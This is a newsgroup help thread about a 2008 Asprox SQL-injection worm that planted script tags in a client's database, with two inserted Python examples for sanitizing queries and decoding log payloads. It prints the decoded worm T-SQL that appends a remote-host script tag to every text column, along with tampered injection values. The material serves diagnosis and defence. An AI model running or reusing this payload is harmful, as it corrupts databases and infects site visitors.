Virus? >script src=http://www.westpacsecuresite.com/b.js<>/script< - Inetserver
Virus? >script src=http://www.westpacsecuresite.com/b.js<>/script<
Hi all
A client of mine is having a problem with their site and when I looked
into the SQL database, I found that most text fields have been altered
and appended with
script src=http://www.westpacsecuresite.com/b.js/script
I've taken out the < > so that this shows.
Has anyone seen this? I've seen other sites on the net when I did a
google search.
http://www.google.com/search?q=%3Csc...e7&rlz=1I7GGLJ
Has my server been hacked? Any one seen this?
Thanks
-
Re: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/script<
<michael@lonelyprogrammer.com> wrote in message
news:bc613352-fae3-4bb6-95d2-e193043c79e9@m45g2000hsb.googlegroups.com...
Yes, it's a SQL Injection attack that is intended to run scripts on the
computer of anyone who visits your client's site, which download a Trojan
called Asprox. This is nearly always the result of poor programming
practice - failure to validate user input, use parameters and/or HTMLEncode
any user supplied values that are written to a web page.
--
Mike Brind
Microsoft MVP - ASP/ASP.NET
-
RE: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/script<
Yep, you've received a nice SQL Injection attack.
So now you get to go through all your pages and find all the places where
you are accepting Request.QueryString and Request.Form values and start both
validating and sanitizing them.
Tedious and time consuming, but pretty easy. Just need to create some
sanitizing functions that you use all over the place.
I tend to use ones like this:
<%
' Wrap a string value for SQL: double any embedded single quotes and add the
' surrounding quotes, so the value cannot break out of the literal.
Function SQLString( txt )
    SQLString = "'" & Replace( txt, "'", "''" ) & "'"
End Function

' Accept only values VBScript recognises as dates; anything else becomes NULL.
' The literal is written in the server's locale date format.
Function SQLDate( dt )
    If IsDate(dt) Then
        dt = CDate(dt)
        SQLDate = "'" & dt & "'"
    Else
        SQLDate = "NULL"
    End If
End Function

' Accept only numeric values (normalised through CDbl); anything else, such as
' "123;DECLARE ...", becomes NULL instead of reaching the query text.
Function SQLNumber( num )
    If IsNumeric( num ) Then
        SQLNumber = CStr( CDbl( num ) )
    Else
        SQLNumber = "NULL"
    End If
End Function
%>
And then you replace all your unprotected queries, such as
    SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id
with
    SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " & SQLNumber(id)
And so on.
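The helpers above and the before/after query, side by side with the parameter-marker form that later replies in the thread recommend, as an added Python example (not code from the thread) run against an in-memory SQLite table. The table, its rows and the tampered id value are constructed placeholders, and executescript stands in for a server that accepts multi-statement batches.

```python
import math
import sqlite3

# Constructed placeholder for the kind of tampered "id" value the thread describes:
# the expected number followed by an extra statement that appends a script tag.
SCRIPT_TAG = "<script src=http://example.invalid/b.js></script>"
TAMPERED_ID = "123;UPDATE notes SET body = body || '" + SCRIPT_TAG + "'"

def sql_string(txt):
    """Python twin of Old Pedant's SQLString(): quote the value, doubling embedded quotes."""
    return "'" + str(txt).replace("'", "''") + "'"

def sql_number(num):
    """Python twin of SQLNumber(): a clean numeric literal, or NULL for anything else."""
    try:
        value = float(num)
    except (TypeError, ValueError):
        return "NULL"
    if not math.isfinite(value):
        return "NULL"
    return str(int(value)) if value.is_integer() else str(value)

def fresh_db():
    """In-memory stand-in for the client's database (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO notes VALUES (?, ?)", [(1, "first"), (123, "target")])
    return conn

def bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM notes ORDER BY id")]

def update_unsafe(conn, foo, id_):
    """The unprotected query from the thread: request values pasted into the SQL text.
    executescript stands in for a server that runs multi-statement batches."""
    conn.executescript("UPDATE notes SET body = '" + foo + "' WHERE id = " + id_)
    return bodies(conn)

def update_sanitized(conn, foo, id_):
    """The same query built with the helpers: the tampered id collapses to NULL."""
    conn.execute("UPDATE notes SET body = " + sql_string(foo)
                 + " WHERE id = " + sql_number(id_))
    return bodies(conn)

def update_parameterized(conn, foo, id_):
    """Parameter markers: the values never become part of the SQL text at all."""
    conn.execute("UPDATE notes SET body = ? WHERE id = ?", (foo, id_))
    return bodies(conn)
```

With the tampered id, the unprotected version rewrites every row, while both the helper-built query and the parameterized query touch nothing.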
-
RE: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/scr
Oh, yeah...and as Mike pointed out, even all that won't protect you from
people putting <SCRIPT> tags, etc., into (say) <TEXTAREA> input.
So unless you *NEED* to allow HTML in some text fields, use a regular
expression to strip it all out.
-
RE: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/scr
Hi...
Is there a way for people to be able to get all the table names in your
database using SQL Injection Attacks?
I'm asking since the attacker was able to add SCRIPT tags to tables that
aren't really even used on pages any more.
Thoughts?
Thanks
MU
"Old Pedant" wrote:
-
Re: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/scr
Yes, it is possible. Grab a coffee:
http://www.ngssoftware.com/papers/ad..._injection.pdf
--
Mike Brind
MVP - ASP/ASP.NET
"MU" <MU@discussions.microsoft.com> wrote in message
news:54C50D13-329E-4F1F-A439-440282DB8969@microsoft.com...
-
Re: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/scr
The article cited by Mike is an excellent resource, but it fails to mention
the method used by the worm that attacked your system. You can read about it
in this link provided by Old Pedant:
http://isc.sans.org/diary.html?n&storyid=4294
This is a two-stage attack:
SQL Injection is used to determine database objects and insert the data the
bot wants to insert
Script Injection is used to cause client browsers to execute script injected
by the bot.
Here is my standard blurb about avoiding sql injection:
Your use of dynamic sql is leaving you vulnerable to hackers using sql
injection:
http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
See here for a better, more secure way to execute your queries by using
parameter markers/tokens:
http://groups-beta.google.com/group/...e36562fee7804e
Personally, I prefer using stored procedures, or saved parameter queries as
they are known in Access:
Access:
http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl
http://groups.google.com/groups?hl=e...tngp13.phx.gbl
SQL Server:
http://groups.google.com/group/micro...9dc1701?hl=en&
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
-
Re: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/scr
Just an FYI I just looked at my log files (which I should have done in the
first place to see the point of entry) and the IP is 189.94.135.4 that is
hacking at the site.
He has a HUGE declare statement in the URL post with a CAST function with
numbers. How can I convert the numbers in the CAST to see what he's trying
to do?
Thanks for all your help above.
MU
"Bob Barrows [MVP]" wrote:
-
Re: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/scr
Perhaps this will be helpful:
http://blogs.technet.com/neilcar/arc...rt-2-meat.aspx
MU wrote:
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
-
Re: Virus? >script src=http://www.westpacsecuresite.com/b.js<>/scr
MU wrote:
> He has a HUGE declare statement in the URL post with a CAST function
> with numbers. How can I convert the numbers in the CAST to see what
> he's trying to do?
Consider this line of logfile:
2008-06-26 07:33:43 xxx.xxx.xxx.xxx - W3SVCN YOURSERVER yyy.yyy.yyy.yyy 80
POST /path/script.asp
id=123;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(...)|-|ASP_0113|Script_timed_out
500 0 112 2443 302781 HTTP/1.1 your.host.header
Mozilla/3.0+(compatible;+Indy+Library) -
Grab everything from the first semicolon to the last, and change [EXEC(@S)]
to [SELECT @S]. Execute against any SQL Server, and examine the result:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.j8j8hei.cn/k.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
--
Dave Anderson
Unsolicited commercial email will be read at a cost of $500 per message. Use
of this email address implies consent to these terms.
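MU's question about reading the numbers inside the CAST, and Dave's answer above, as an added Python example (not code from the thread): it URL-decodes an IIS log line, pulls the hex out of CAST(0x... AS NVARCHAR(...)), decodes it as UTF-16LE and flags the sysobjects/syscolumns-plus-UPDATE pattern, so a log can be reviewed without executing anything on a SQL Server. The log line and the statement hidden in it are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed placeholder for the worm's statement (the log line quoted in the thread
# has the real hex blob removed); the real statement is the cursor shown above.
PLACEHOLDER_SQL = ("DECLARE Table_Cursor CURSOR FOR select a.name,b.name "
                   "from sysobjects a,syscolumns b where a.id=b.id -- update placeholder")
# NVARCHAR(4000) payloads are UTF-16LE, which is why each character shows as two bytes.
PLACEHOLDER_HEX = PLACEHOLDER_SQL.encode("utf-16-le").hex().upper()

# Constructed IIS log line in the shape quoted in the thread, not a real capture.
SAMPLE_LOG_LINE = (
    "2008-06-26 07:33:43 192.0.2.10 - W3SVC1 YOURSERVER 198.51.100.5 80 POST /path/script.asp "
    "id=123;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + PLACEHOLDER_HEX
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 500 0 112 2443 302781 HTTP/1.1 your.host.header "
    "Mozilla/3.0+(compatible;+Indy+Library) -"
)

CAST_RE = re.compile(r"CAST\(0x([0-9A-F]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)

def decode_cast_payload(log_line):
    """Return the statement hidden in CAST(0x... AS [N]VARCHAR(...)), or None if absent.
    The line is URL-decoded first; NVARCHAR hex is UTF-16LE, VARCHAR is one byte per char."""
    match = CAST_RE.search(unquote(log_line))
    if not match:
        return None
    try:
        raw = bytes.fromhex(match.group(1))
    except ValueError:          # odd-length or otherwise malformed hex
        return None
    if match.group(2).upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def looks_like_mass_injection(statement):
    """Flag the worm's signature: a walk over sysobjects/syscolumns feeding an UPDATE."""
    lowered = statement.lower()
    return all(word in lowered for word in ("sysobjects", "syscolumns", "update"))

def scan_log(lines):
    """Yield (line number, decoded statement, flagged) for every line carrying a CAST payload."""
    for number, line in enumerate(lines, 1):
        decoded = decode_cast_payload(line)
        if decoded is not None:
            yield number, decoded, looks_like_mass_injection(decoded)
```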